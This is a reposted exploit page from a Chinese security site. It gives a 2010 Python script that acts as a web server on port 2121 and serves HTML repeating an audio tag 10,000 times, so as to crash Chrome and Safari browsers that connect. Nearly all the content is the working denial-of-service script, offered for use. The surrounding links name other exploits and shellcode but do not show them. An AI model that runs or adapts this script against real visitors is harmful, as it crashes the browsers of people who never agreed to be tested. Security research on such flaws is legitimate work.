首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Multiple Browsers Audio Tag DoS Vulnerability
来源:http://twitter.com/tzDev 作者:Higgins 发布时间:2010-04-22  

#!/usr/bin/python

#Multiple Browsers Audio Tag Denial of Service Vulnerability
#any ogg file can be used for the DoS as long as it is a valid file on the server
#crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
#This script acts as a web server to DoS connecting clients

# Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
# Date: April 21th, 2010
# Author: Chase Higgins, http://twitter.com/tzDev
# Software Link: google.com/chrome, apple.com/safari
# Version: Google Chrome 5.0.375.9 dev
# Tested on: Mac OSX 10.5.8
 
import sys, socket;

def main():
 html = """
 <html>
 <body>
 """;
 
 html += "<audio src='myogg.ogg'>" * 10000;
 
 html += """
 </body>
 </html>
 """;
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
 s.bind(('', 2121));
 s.listen(1);
 
 while True:
  channel, details = s.accept();
  print channel.recv(256);
  channel.send(html);
  channel.close();
 
main();


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox/Thunderbird/Se
·ZipGenius zgtips.dll Stack Buf
·Speed Commander 13.10 (.zip) M
·bds/x86-bindshell on port 2525
·Linux write() & exit(0) shellc
·linux/x86 setreuid(0, 0) & exe
·Acritum Femitter v1.03 Directo
·bsd/x86 reboot() shellcode 15
·Mongoose Web Server v2.8 Multi
·Apache OFBiz Multiple XSS Vuln
·MultiThreaded HTTP Server v1.1
·Invision Power Board 0-day den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved